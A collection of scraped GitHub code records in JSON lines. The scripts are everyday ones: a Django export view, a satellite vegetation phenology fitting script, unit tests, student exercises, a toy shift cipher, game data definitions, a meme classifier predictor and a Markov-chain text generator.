+{"seq_id":"42792671886","text":"#vim: set fileencoding=utf-8\nimport os\nimport time\nimport hashlib\nfrom os.path import normpath\nfrom os.path import join\nfrom django.conf import settings\nfrom django.contrib.auth import decorators\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic.base import TemplateView\nfrom documents.models import Document\nfrom documents.lib.allegro import Allegro\nfrom documents.lib.bibtex import Bibtex\n\n\nclass ExportView(TemplateView):\n template_name = 'documents/export.html'\n\n def get_context_data(self, **kwargs):\n context = super(ExportView, self).get_context_data(**kwargs)\n biblist = list()\n allegrolist = list()\n _basepath = normpath(settings.DOCUMENTS_SECDIR)\n _bibtexdir = normpath(settings.DOCUMENTS_BIBTEX)\n _allegrodir = normpath(settings.DOCUMENTS_ALLEGRO_FILES)\n filepath_bibtex = normpath(join(_basepath, _bibtexdir))\n filepath_allegro = normpath(join(_basepath, _allegrodir))\n for file in sorted(os.listdir(filepath_bibtex)):\n if str(file).lower().endswith('.bib'):\n _sec_path = join(_bibtexdir, file)\n sec_link = _gen_sec_link(_sec_path)\n biblist.append({'link': sec_link, 'desc': str(file)})\n for file in sorted(os.listdir(filepath_allegro)):\n if str(file).lower().endswith('.adt'):\n _sec_path = join(_allegrodir, file)\n sec_link = _gen_sec_link(_sec_path)\n allegrolist.append({'link': sec_link, 'desc': str(file)})\n biblist.reverse()\n context['biblist'] = biblist\n context['biblist_small'] = biblist[0:3]\n context['export_bib_state'] = Bibtex.get_state()\n\n allegrolist.reverse()\n context['allegrolist'] = allegrolist\n context['allegrolist_small'] = allegrolist[0:3]\n context['export_allegro_state'] = Allegro.get_state()\n return context\n\n @method_decorator(\n decorators.permission_required('documents.can_see_export', raise_exception=True))\n def dispatch(self, *args, **kwargs):\n return super(ExportView, self).dispatch(*args, **kwargs)\n\n\ndef _gen_sec_link(path):\n \"\"\" Generate a formerly secure link, now its only a link.\n\n This method formerly generated a secure link to the BibTeX and Allegro\n export files. These file have been moved to /static/ in order to guarantee\n a fast drop of the dependency of lighttpd. 
Now essentially every webserver\n can be used to deploy WireLib.\n If in a random future secure links should be reimplemented the 'X-Sendfile'\n flag is probably a good starting point.\n \"\"\"\n static = settings.STATIC_URL\n sec_path = settings.DOCUMENTS_SECDIR\n sec_dir = sec_path.rpartition('static/')[2] # Everything left of static.\n file_path = join(static, sec_dir, path)\n return file_path\n\n\n@decorators.permission_required('documents.can_export', raise_exception=True)\ndef export_allegro(request):\n if not Allegro.get_state():\n allegro_thread = Allegro()\n allegro_thread.start()\n return HttpResponseRedirect(reverse('documents.export'))\n\n\n@decorators.permission_required('documents.can_export', raise_exception=True)\ndef export_bibtex(request):\n if not Bibtex.get_state():\n docs_to_export = Document.objects.filter(bib_date__isnull=True)\n _basepath = normpath(settings.DOCUMENTS_SECDIR)\n _bibtexdir = normpath(settings.DOCUMENTS_BIBTEX)\n _filepath_bibtex = normpath(join(_basepath, _bibtexdir))\n bibtex_thread = Bibtex().export_data(docs_to_export, _filepath_bibtex)\n bibtex_thread.start()\n return HttpResponseRedirect(reverse('documents.export'))\n","repo_name":"WiReSEP/WireLib2012","sub_path":"src/documents/views/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"29796052409","text":"# ######################################## LOAD REQUIRED MODULES ############################################## #\nimport os\nimport sys\nimport time\nimport datetime\nimport ogr\nimport osr\nfrom osgeo import gdal\nfrom osgeo.gdalconst import *\nimport numpy as np\nfrom osgeo import gdal_array as gdalnumeric\nimport csv\nimport itertools\nimport math\ngdal.TermProgress = gdal.TermProgress_nocb\ngdal.TermProgress = gdal.TermProgress_nocb\nimport scipy.ndimage\nimport struct\nfrom scipy.optimize import leastsq\nfrom pylab import *\n\n# ####################################### SET TIME-COUNT ################################################################## #\nstarttime = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())\nprint(\"--------------------------------------------------------\")\nprint(\"Starting process, time:\", starttime)\nprint(\"\")\n# ####################################### BUILD GLOBAL FUNCTIONS ########################################################## #\ndef GetInfoFromCSV(csv_file, subsetRow, subsetColumn, variable): # Row is 'year', Column is 'point' (starts column 4 (3 in py-notation))\n\tdata = np.genfromtxt(csv_file, names = True, delimiter = ',', dtype = None)\n\tout_array = [[],[]]\n\tif variable == \"ndvi\":\n\t\tfor row in data:\n\t\t\tif row['Year'] == subsetRow:\n\t\t\t\tout_array[1].append((row[subsetColumn] * 0.0001))\n\t\t\t\tout_array[0].append(row['DOY'])\n\tif variable == \"temp\":\n\t\tfor row in data:\n\t\t\tif row['Year'] == subsetRow:\n\t\t\t\tout_array[1].append((row[subsetColumn] - 273.15)) \n\t\t\t\tout_array[0].append(row['DOY'])\n\treturn np.array(out_array)\n\ndef CalculateAGDD(temperature_table, t_base, t_max):\n out_array = []\n out_array.append(temperature_table[0])\n b = np.clip (temperature_table[1], t_base, t_max)\n c = np.where (b - t_base < 0, 0, b - t_base)\n agdd = c.cumsum ( axis=0 )\n out_array.append(list(agdd))\n return out_array\n\ndef InterpolateNDVI(ndvi_data, temp_data):\n out_array = []\n DOYs = np.arange(1, (len(temp_data[0])+1))\n ndvi_days = ndvi_data[0]\n ndvi_vals = ndvi_data[1]\n ndvid 
= np.interp(DOYs, ndvi_days, ndvi_vals)\n out_array.append(DOYs)\n out_array.append(ndvid)\n return out_array\n\ndef FitNDVI(ndvi_day):\n\tDOY = ndvi_day[0]\n\tndvis = ndvi_daily[1]\n\tndvi_max = np.max(ndvis)\n\tndvi_min = ndvi_daily[1][0]\n\tfitfunc = lambda p, DOY: ndvi_min + (ndvi_max-ndvi_min) * (1./(1+np.exp(p[0]*(DOY-p[1])))+1./(1+np.exp(p[2]*(DOY-p[3]))) - 1)\n\tinit = np.array([0.3, 165, 0.3, 240])\n\terrfunc = lambda p, doy, NDVI: fitfunc(p, doy) - NDVI\n\tp1,success = leastsq(errfunc, init[:], args=(DOY,ndvis),maxfev=100000000)\n\treturn p1\n\ndef FitPhenologyModel(agdd_daily, ndvi_daily):\n\tnp.seterr(over=None)\n\tDOY = ndvi_daily[0]\n\tndvis = ndvi_daily[1]\n\tagdds = agdd_daily[1]\n\tndvi_min = np.min(ndvis)\n\tndvi_range = np.max(ndvis) - np.min(ndvis)\n\tinit_parameters = np.array([ndvi_min, ndvi_range, 0.3, 165, 0.3, 240])\n\tPhenoFunction = init_parameters[0]+init_parameters[1]*(1./(1+np.exp(init_parameters[2]*(agdd_daily-init_parameters[3])))+1./(1+np.exp(-init_parameters[4]*(agdd_daily-init_parameters[5])))-1)\n\toutput = []\n\tfitness = lambda p, ndvi, agdd: ndvi - PhenoFunction\n\toot = fitness(init_parameters, ndvi_daily, agdd_daily)\n\t[output.append(x) for x in oot]\n\toutput = np.array(output).squeeze()\n\treturn output\t\n\t\ndef WriteOutput(outlist, outfile):\n\tprint(\"Write Output-File\")\n\twith open(outfile, \"w\") as the_file:\n\t\tcsv.register_dialect(\"custom\", delimiter=\",\", skipinitialspace=True, lineterminator='\\n')\n\t\twriter = csv.writer(the_file, dialect=\"custom\")\n\t\tfor element in outlist:\n\t\t\twriter.writerow(element)\n\n# ####################################### ESTABLISH INPUT-PARAMETERS FOR WHOLE SCRIPT ##################################### #\n# (1) Input-Tables from previous processes\nNDVI_input = \"E:/kirkdata/mbaumann/Species-separation_Chapter03/05_Warping/01_Point-Intersection_MODIS-NDVI_Output_doyAdded.csv\"\nTMP_input = \"E:/kirkdata/mbaumann/Species-separation_Chapter03/05_Warping/02_DailyMeanTemp_Output_doyAdded.csv\"\n# (2) Year, which we will process\nyear_list = [2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2011,2012]\n# (3) Names of Point-Location that we collected values for\npoint_list = [\"Point_01\",\"Point_02\",\"Point_03\",\"Point_04\",\"Point_05\",\"Point_06\",\"Point_07\",\"Point_08\",\"Point_09\",\"Point_10\",\"Point_11\",\"Point_12\", \\\n\"Point_13\",\"Point_14\",\"Point_15\",\"Point_16\",\"Point_17\",\"Point_18\",\"Point_19\",\"Point_20\",\"Point_21\",\"Point_22\",\"Point_23\"]\n# (4) Minimum temperature for Growing Degrees\nt_base = 10\n# (5) Maximum temperature for Growing Degrees\nt_max = 40\n\n# ######################################## ESTABLISH OUTPUT-LISTS THAT WE FILL WITH THE VALUES ############################ #\noutput_NDVI_Interpolation = [] # NDVI-INTERPOLATION\noutput_AGDD_Calculation = []\noutput_parameters = [] # FITTING PARAMETERS\noutput_parameters_Titles = [\"Point_ID\", \"Year\", \"Param_p[0]\",\"Param_p[1]\",\"Param_p[2]\",\"Param_p[3]\"]\noutput_parameters.append(output_parameters_Titles)\noutput_NDVI_Fitting = []\noutput_phenology = []\n\n# ######################################## FIT YEARLY NDVI-CURVES FOR 1 POINT IN 1 YEAR, EXTRACT PARAMETERS ############### #\nfor point in point_list:\n\tprint(\"Processing Point: \", point)\n\tvariable = point\n\t# Establish list for daily NDVI-interpolation\n\tndvi_list = [variable]\n\t# Establish list for Accumulated Growind Degree Days (AGDD)\n\tagdd_list = [variable]\n\t# Establish list for fitted NDVI-values\n\tndviFIT_list = 
[variable]\n\t# Establish list for daily Phenology-Model-output\n\tphenoVals_list = [variable]\n\t# Establish list for Year and Day of Year\n\ty_list = [\"Year\"]\n\td_list = [\"DOY\"]\n\tfor yr in year_list:\n\t\tyear = yr\n\t\tprint(\"Year: \", year)\n\t\t# Generate Data to use\n\t\tndvi_yr_point = GetInfoFromCSV(NDVI_input, year, variable, \"ndvi\")\n\t\ttemp_yr_point = GetInfoFromCSV(TMP_input, year, variable, \"temp\")\n\t\t# Generate information about YEAR and DOY, append to list\n\t\tdoy_list = list(temp_yr_point[0])\n\t\tfor day in doy_list:\n\t\t\td_list.append(int(day))\n\t\ty_list_tmp = np.repeat(year, len(doy_list))\t\t\n\t\tfor y in y_list_tmp:\n\t\t\ty_list.append(int(y))\n\t\t# Calculate AGDD and write into list of AGDD-Calculation\n\t\tprint(\"AGDD\")\n\t\tagdd = CalculateAGDD(temp_yr_point, t_base, t_max)\n\t\tagdds = agdd[1]\n\t\tfor gdd in agdds:\n\t\t\tagdd_list.append(gdd)\n\t\t# Do NDVI-Interpolation and write into list of NDVI-Interpolation\n\t\tprint(\"NDVI-Interpolation\")\n\t\tndvi_daily = InterpolateNDVI(ndvi_yr_point, temp_yr_point)\n\t\tndvis = ndvi_daily[1]\n\t\tfor ndvi in ndvis:\n\t\t\tndvi_list.append(ndvi)\n\t\t# Do the NDVI-Fit and extract the parameters\n\t\tprint(\"Parameter Estimation\")\n\t\tparams = FitNDVI(ndvi_daily)\n\t\tparam_list = []\n\t\tparam_list.append(variable)\n\t\tparam_list.append(year)\n\t\tfor param in params:\n\t\t\tparam_list.append(param)\n\t\toutput_parameters.append(param_list)\n\t\tprint(\"Model NDVI\")\n\t\tndvi_max = np.max(ndvis)\n\t\tndvi_min = np.min(ndvis)\n\t\tfor day in doy_list:\n\t\t\tndvifit = ndvi_min + (ndvi_max-ndvi_min) * (1./(1+np.exp(params[0]*(day-params[1])))+1./(1+np.exp(params[2]*(day-params[3]))) - 1)\n\t\t\tndviFIT_list.append(ndvifit)\n\t\tprint(\"Model Phenology\")\n\t\tvals = FitPhenologyModel(agdd, ndvi_daily)\n\t\tphenos = vals[1]\n\t\tfor val in phenos:\n\t\t\tphenoVals_list.append(val)\n\n\toutput_NDVI_Interpolation.append(y_list)\n\toutput_NDVI_Interpolation.append(d_list)\t\n\toutput_NDVI_Interpolation.append(ndvi_list)\t\t\n\toutput_AGDD_Calculation.append(y_list)\n\toutput_AGDD_Calculation.append(d_list)\n\toutput_AGDD_Calculation.append(agdd_list)\n\toutput_NDVI_Fitting.append(y_list)\n\toutput_NDVI_Fitting.append(d_list)\n\toutput_NDVI_Fitting.append(ndviFIT_list)\n\toutput_phenology.append(y_list)\n\toutput_phenology.append(d_list)\n\toutput_phenology.append(phenoVals_list)\t\n\tprint(\"\")\n\t\n# Remove duplicates from the list (i.e., all the columns with Nx-Year etc.\noutput_NDVI_Interpolation.sort()\noutput_NDVI_Interpolation = list(output_NDVI_Interpolation for output_NDVI_Interpolation,_ in itertools.groupby(output_NDVI_Interpolation))\noutput_NDVI_Interpolation = map(list, zip(*output_NDVI_Interpolation))\noutput_AGDD_Calculation.sort()\noutput_AGDD_Calculation = list(output_AGDD_Calculation for output_AGDD_Calculation,_ in itertools.groupby(output_AGDD_Calculation))\noutput_AGDD_Calculation = map(list, zip(*output_AGDD_Calculation))\noutput_NDVI_Fitting.sort()\noutput_NDVI_Fitting = list(output_NDVI_Fitting for output_NDVI_Fitting,_ in itertools.groupby(output_NDVI_Fitting))\noutput_NDVI_Fitting = map(list, zip(*output_NDVI_Fitting))\noutput_phenology.sort()\noutput_phenology = list(output_phenology for output_phenology,_ in itertools.groupby(output_phenology))\noutput_phenology = map(list, zip(*output_phenology))\nprint(\"\")\n# ####################################### WRITE THE OUTPUT FILE ########################################################## #\nprint(\"Writing 
Output-Files\")\noutfile_params = \"E:/kirkdata/mbaumann/Species-separation_Chapter03/05_Warping/03_FitPhenology_OptimizedParameters.csv\"\noutfile_NDVIdaily = \"E:/kirkdata/mbaumann/Species-separation_Chapter03/05_Warping/03_FitPhenology_NDVI-daily.csv\"\noutfile_AGDD = \"E:/kirkdata/mbaumann/Species-separation_Chapter03/05_Warping/03_FitPhenology_AGDD.csv\"\noutfile_NDVIfit = \"E:/kirkdata/mbaumann/Species-separation_Chapter03/05_Warping/03_FitPhenology_NDVI-fitted.csv\"\noutfile_Phenology = \"E:/kirkdata/mbaumann/Species-separation_Chapter03/05_Warping/03_FitPhenology_Phenology.csv\"\nWriteOutput(output_parameters, outfile_params)\nWriteOutput(output_NDVI_Interpolation, outfile_NDVIdaily)\nWriteOutput(output_AGDD_Calculation, outfile_AGDD)\nWriteOutput(output_NDVI_Fitting, outfile_NDVIfit)\nWriteOutput(output_phenology, outfile_Phenology) \n# ####################################### END TIME-COUNT AND PRINT TIME STATS ############################################ # \nprint(\"\")\nendtime = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())\nprint(\"--------------------------------------------------------\")\nprint(\"--------------------------------------------------------\")\nprint(\"start: \", starttime)\nprint(\"end: \", endtime)\nprint(\"\")","repo_name":"matthias-baumann/ScriptCollections_py","sub_path":"OLD_UnorderedScripts/00_Fit-MODIS-Phenology.py","file_name":"00_Fit-MODIS-Phenology.py","file_ext":"py","file_size_in_byte":9943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13218010261","text":"from random import choice\nfrom unittest import TestCase\n\nimport pandas as pd\n\nfrom kaogexp.data.loader import ColunaYSingleton\nfrom kaogexp.data.sampler.categorical_sampler import RandomCategoricalSampler\n\n\nclass TestRandomCategoricalSampler(TestCase):\n\n @classmethod\n def setUpClass(cls) -> None:\n ColunaYSingleton().NOME_COLUNA_Y = 'target'\n\n def setUp(self) -> None:\n self.data = pd.DataFrame(\n {\n 'a': [1, 2, 3, 5, 3],\n 'b': ['m', 'm', 'f', 'f', 'f'],\n 'c': [1, 3, 3, 2, 1],\n 'd': [.4, .2, .5, .2, 1]\n }\n )\n\n def test__definir_colunas_alteradas(self):\n cat_cols = pd.Index(['a', 'b', 'c'])\n fixed_cols = pd.Index(['b'])\n expected = pd.Index(['a', 'c'])\n instance = RandomCategoricalSampler(self.data, cat_cols, fixed_cols)\n\n result = instance._definir_colunas_alteradas()\n\n print(result)\n pd.testing.assert_index_equal(expected, result)\n\n def test_obter_valores_cat_unicos(self):\n cat_cols = pd.Index(['a', 'b', 'c'])\n fixed_cols = pd.Index(['c', 'd'])\n expected = {\n 'a': [1, 2, 3, 5],\n 'b': ['m', 'f']\n }\n\n instance = RandomCategoricalSampler(self.data, cat_cols, fixed_cols)\n result = instance._obter_valores_cat_unicos()\n\n print(result)\n self.assertDictEqual(expected, result)\n\n def test_realizar_amostragem(self):\n cat_cols = pd.Index(['a', 'b', 'c'])\n fixed_cols = pd.Index(['c', 'd'])\n num_amostras = 10\n amostra = pd.DataFrame(\n {\n 'a': [choice(range(1, 6))] * num_amostras,\n 'b': [choice(['f', 'm'])] * num_amostras,\n 'c': [choice(range(1, 4))] * num_amostras,\n 'd': [0] * num_amostras\n }\n )\n print('Original')\n print(amostra)\n instance = RandomCategoricalSampler(self.data, cat_cols, fixed_cols)\n\n result = instance.realizar_amostragem(amostra)\n\n print('Resultado')\n print(result)\n self.assertFalse(result.equals(amostra))\n pd.testing.assert_frame_equal(amostra[fixed_cols], 
result[fixed_cols])\n","repo_name":"Anakin86708/kaogexp","sub_path":"test/test_categorical_sampler.py","file_name":"test_categorical_sampler.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9883090837","text":"'''readme.md\nFaça um programa que leia a idade de 5 pessoas e o sexo de cada uma (assuma que só podem ser\ninformados a letra H para homens e a letra M para mulheres) e que calcule e mostre:\na. A idade média das 5 pessoas;\nb. A idade média dos homens;\nc. A idade média das mulheres.\n'''\n# leia a idade de 5 pessoas e o sexo de cada\n\ncontadorGeral = 0\ncontadorH = 0\ncontadorM = 0\n\nidadeGeral = 0\nidadeH = 0\nidadeM = 0\n\nmediaGeral = 0\nmediaH = 0\nmediaM = 0\n\nwhile contadorGeral < 5:\n # para 5 entradas\n contadorGeral += 1\n # pegar idade\n idade = int(input(\"Informe sua idade: \"))\n # pegar sexo\n sexo = input(\"Informe seu sexo: \")\n # media geral\n idadeGeral += idade\n # media para mulheres\n if sexo == 'M':\n contadorM += 1\n idadeM += idade\n\n # media para homens\n if sexo == 'H':\n contadorH += 1\n idadeH += idade\n\n# media geral\nmediaGeral = idadeGeral/contadorGeral\n# media H\nmediaH = idadeH/contadorH\n# media M\nmediaM = idadeM/contadorM\n# exibindo tudo\nprint(f\"A media geral foi: {mediaGeral}\\nA media para homens foi: {mediaH}\\nA media para mulheres foi: {mediaM}\")\n","repo_name":"Pedro-H-Braga/Disciplinas_Faculdade","sub_path":"Disciplina-Prog-Comp-2022.2/Listas-03/Lista 03/script08.py","file_name":"script08.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21609917042","text":"import fileinput\n\n\ndef partitions(total, buckets):\n    def partitions_recurse(total, min_ix):\n        if total == 0:\n            yield []\n        elif total < 0:\n            return  # PEP 479: raising StopIteration inside a generator is a RuntimeError\n        else:\n            for i, bucket in enumerate(buckets[min_ix:]):\n                for partition in partitions_recurse(total - bucket, min_ix + i + 1):\n                    yield [bucket] + partition\n\n    return partitions_recurse(total, 0)\n\n\ndef part1(buckets):\n    parts = list(partitions(150, buckets))\n\n    return len(parts)\n\n\ndef part2(buckets):\n    parts = list(partitions(150, buckets))\n    min_buckets = min(len(p) for p in parts)\n\n    return sum(1 for p in parts if len(p) == min_buckets)\n\n\nif __name__ == \"__main__\":\n    lines = [line.strip() for line in fileinput.input()]\n    buckets = [int(line) for line in lines]\n\n    print(\"Part 1: %s\" % part1(buckets))\n    print(\"Part 2: %s\" % part2(buckets))\n","repo_name":"julianandrews/adventofcode","sub_path":"2015/python/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"30090997455","text":"\"\"\" Simple encrypt/decrypt functions using Unicode code offset as the key \"\"\"\n\n\ndef unicode_encrypt(clear_text, key):\n    sym_list = [char for char in clear_text]\n    utf_coded = [ord(char) for char in sym_list]\n    pre_encrypt = [char + key for char in utf_coded]\n    encrypt_list = [chr(char) for char in pre_encrypt]\n    encrypt_msg = \"\".join(encrypt_list)\n    return encrypt_msg\n\ndef unicode_decrypt(cipher_text, key):\n    sym_list = [char for char in cipher_text]\n    utf_coded = [ord(char) for char in sym_list]\n    pre_decrypt = [char - key for char in utf_coded]\n    decrypt_list = [chr(char) for char in pre_decrypt]\n    decrypt_msg = \"\".join(decrypt_list)\n    return decrypt_msg\n\n\nif __name__ == '__main__':\n    import pyperclip\n    print()\n    print(\"Do you wish to (1) encrypt or (2) decrypt a message? \")\n    while True:\n        choice = input(\"> \")\n        if choice not in [\"1\", \"2\"]:\n            print(\"Please select 1 (encrypt) or 2 (decrypt)\")\n            continue\n        else:\n            break\n    if choice == \"1\":\n        print(\"Type message to be encrypted\")\n        clear_text = input(\"> \")\n        print()\n        key = int(input(\"Please select a key: \"))\n        print()\n        print(\"Encrypted message:\")\n        encrypted_msg = unicode_encrypt(clear_text, key)\n        print(encrypted_msg)\n        print()\n        pyperclip.copy(encrypted_msg)\n\n    else:\n        print(\"Type message to be decrypted\")\n        cipher_text = input(\"> \")\n        print()\n        key = int(input(\"Please input the key: \"))\n        print()\n        print(\"Decrypted message:\")\n        decrypted_msg = unicode_decrypt(cipher_text, key)\n        print(decrypted_msg)\n        print()\n        pyperclip.copy(decrypted_msg)","repo_name":"mdlattimore/classic_cryptography","sub_path":"cipher_functions/unicode_shift.py","file_name":"unicode_shift.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6015812254","text":"from evennia import create_script\n\nrenown = create_script('typeclasses.scripts.RenownScript',key = 'Cunning')\nrenown.db.longname = 'Cunning'\nrenown.db.reference = 'W:tF p. 99'\nrenown.db.info = 'Uratha hunt things greater than they are. They can\\'t always win through brute force or superior numbers. Sometimes, raw creativity and clever planning win the day. Cunning, Renown of the Irraka and the Iron Masters, governs these behaviors.'\nrenown.db.restricted = False\n\nrenown = create_script('typeclasses.scripts.RenownScript',key = 'Glory')\nrenown.db.longname = 'Glory'\nrenown.db.reference = 'W:tF p. 99'\nrenown.db.info = 'Uratha stand strong, and fight until their muscles tear apart. They boil with epic fury, storm into battle, and remain in the fray in spite of overwhelming threats. Glory, Renown of the Cahalith and the Blood Talons, reflects these behaviors.'\nrenown.db.restricted = False\n\nrenown = create_script('typeclasses.scripts.RenownScript',key = 'Honor')\nrenown.db.longname = 'Honor'\nrenown.db.reference = 'W:tF p. 100'\nrenown.db.info = 'The Forsaken fight not because they must, but because it\\'s right. A werewolf could eschew her ancestral duties, and find a place to hide away from her role. An honorable Uratha grabs that role and owns it proudly, standing as a judge and shepherd. Honor, Renown of the Elodoth and the Storm Lords, rewards these behaviors.'\nrenown.db.restricted = False\n\nrenown = create_script('typeclasses.scripts.RenownScript',key = 'Purity')\nrenown.db.longname = 'Purity'\nrenown.db.reference = 'W:tF p. 100'\nrenown.db.info = 'The Forsaken represent Father Wolf, Luna, and the Firstborn in everything they do. Uratha espousing Purity adhere strictly to the Oath of the Moon, to the exclusion of other concerns. They put their ancestral duty before friendships, work, love, and even territory. Purity, Renown of the Rahu and the Hunters in Darkness, governs such behaviors.'\nrenown.db.restricted = False\n\nrenown = create_script('typeclasses.scripts.RenownScript',key = 'Wisdom')\nrenown.db.longname = 'Wisdom'\nrenown.db.reference = 'W:tF p. 100'\nrenown.db.info = 'The Uratha favor Wisdom as a counterpoint to their savage fury. Sometimes, it\\'s better to take a holistic approach to a problem, even when the blood of the wolf rears its violent head. 
After all, Uratha are beings half of spirit, and have esoteric answers to many questions. Wisdom, Renown of the Ithaeur and the Bone Shadows, governs this.'\nrenown.db.restricted = False\n\npass\n","repo_name":"esampson/codes","sub_path":"codes/statInit/initRenown.py","file_name":"initRenown.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"44040627444","text":"from Model import MemeModel\nfrom transformers import DistilBertTokenizer\nimport torch\nload_steps = 1000\n\n\ndef predict_model(text):\n \n tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-uncased')\n item = tokenizer(text, padding='max_length', \n max_length=512, truncation=True,\n return_tensors=\"pt\")\n \n device = torch.device(\"cpu\")\n model = MemeModel(1, device=device, num_labels=4) \n model.load(load_steps)\n with torch.no_grad():\n y_pred, _ = model(item['input_ids'], \n item['attention_mask'], \n labels=None)\n y_pred = torch.argmax(y_pred, axis=1)\n \n return y_pred\n\n\nif __name__ == \"__main__\":\n predict_model()","repo_name":"andersparslov/bert-for-memes","sub_path":"src/models/predict_model.py","file_name":"predict_model.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22694449867","text":"import json\nimport random\n\nrandom.seed()\nwith open('json/cards.json', 'r') as f:\n cards = json.load(f)\n\ndict_names = {}\nlist_name_lengths = []\ndict_descriptions = {}\nlist_description_lengths = []\ncard_count = len(cards)\nfirst_words = []\nfirst_letters = []\n\n# building corpus out of json\nfor _, card in cards.items():\n for k, v in card.items():\n if k == \"NAME\":\n\n list_name_lengths.append(len(v.split()))\n first_letters.append((v[0], v[1]))\n\n for i, c1 in enumerate(v[:-2]):\n c2 = v[i+1]\n t = v[i+2]\n if (c1, c2) in dict_names:\n dict_names[(c1, c2)].append(t)\n else:\n dict_names[(c1, c2)] = [t]\n\n elif k == \"DESCRIPTION\":\n\n list_description_lengths.append(len(v.split()))\n if len(v.split()) > 1:\n first_words.append((v.split()[0], v.split()[1]))\n\n for i, word1 in enumerate(v.split()[:-2]):\n word2 = v.split()[i+1]\n target = v.split()[i+2]\n if (word1, word2) in dict_descriptions:\n dict_descriptions[(word1, word2)].append(target)\n else:\n dict_descriptions[(word1, word2)] = [target]\n\n# use corpus to generate card\ndescriptions = []\nnames = []\nfor _ in range(100):\n\n key = random.choice(first_words)\n new_card = [key[0], key[1]]\n while True:\n\n w = random.choice(list(dict_descriptions[key]))\n new_card.append(w)\n key = (key[1], w)\n if key not in dict_descriptions or (w[-1][-1]==\".\" and random.randint(0,100) < 75):\n break\n\n description = \" \".join(new_card)\n descriptions.append(description)\n\n key_letter = random.choice(first_letters)\n new_card_name = [key_letter[0], key_letter[1]]\n while True:\n\n l = random.choice(list(dict_names[key_letter]))\n new_card_name.append(l)\n key_letter = (key_letter[1], l)\n if key_letter not in dict_names or len(\"\".join(new_card_name).split()) > random.randint(0, 5):\n break\n\n name = \"\".join(new_card_name)\n names.append(name)\n print(name+\"\\n\", description.replace(\" NL \", \"\\n\"))\n print()\n\ninput(\"Press Enter to 
close\")\n\n","repo_name":"Maleval/sts-markov","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3141431662","text":"\"\"\"\nPython skill test from:\nhttps://www.testdome.com/questions/python/song/25557?visibility=1&skillId=9\n\nAuthor:\nAnonymous\n\nScore:\n100% (4 pass / 0 fail)\n\nQuestion:\nA playlist is considered a repeating playlist if any of the songs contain a reference \nto a previous song in the playlist. Otherwise, the playlist will end with the last song \nwhich points to None.\n\nImplement a function is_repeating_playlist that, efficiently with respect to time used, \nreturns true if a playlist is repeating or false if it is not.\n\nFor example, the following code prints \"True\" as both songs point to each other.\n\n> first = Song(\"Hello\")\n> second = Song(\"Eye of the tiger\")\n \n> first.next_song(second);\n> second.next_song(first);\n \n> print(first.is_repeating_playlist())\n\"\"\"\n\n######## Start Original script ########\n\n# class Song:\n# def __init__(self, name):\n# self.name = name\n# self.next = None\n\n# def next_song(self, song):\n# self.next = song \n \n# def is_repeating_playlist(self):\n# \"\"\"\n# :returns: (bool) True if the playlist is repeating, False if not.\n# \"\"\"\n# return None\n \n# first = Song(\"Hello\")\n# second = Song(\"Eye of the tiger\")\n \n# first.next_song(second);\n# second.next_song(first);\n \n# print(first.is_repeating_playlist())\n\n######## End Original script ########\n\nclass Song:\n def __init__(self, name):\n self.name = name\n self.next = None\n\n def next_song(self, song):\n self.next = song \n \n def is_repeating_playlist(self):\n \"\"\"\n :returns: (bool) True if the playlist is repeating, False if not.\n \"\"\"\n # With large dataset, use of set() is required instead of a list()\n song_set = set()\n current_song = self\n\n while current_song:\n if current_song.name in song_set:\n return True # If the current song is in song_set (already played, return True)\n \n # Add current song to the list and change song\n song_set.add(current_song.name) # append with list(), add with set()\n current_song = current_song.next\n\n # Return False if no double song have been found\n return False\n\n \nfirst = Song(\"Hello\")\nsecond = Song(\"Eye of the tiger\")\n \nfirst.next_song(second);\nsecond.next_song(first);\n \nprint(first.is_repeating_playlist())","repo_name":"Gbally/testdome_python","sub_path":"6_song.py","file_name":"6_song.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38320331599","text":"# vim: set sw=2 ts=2 softtabstop=2 expandtab:\nfrom . 
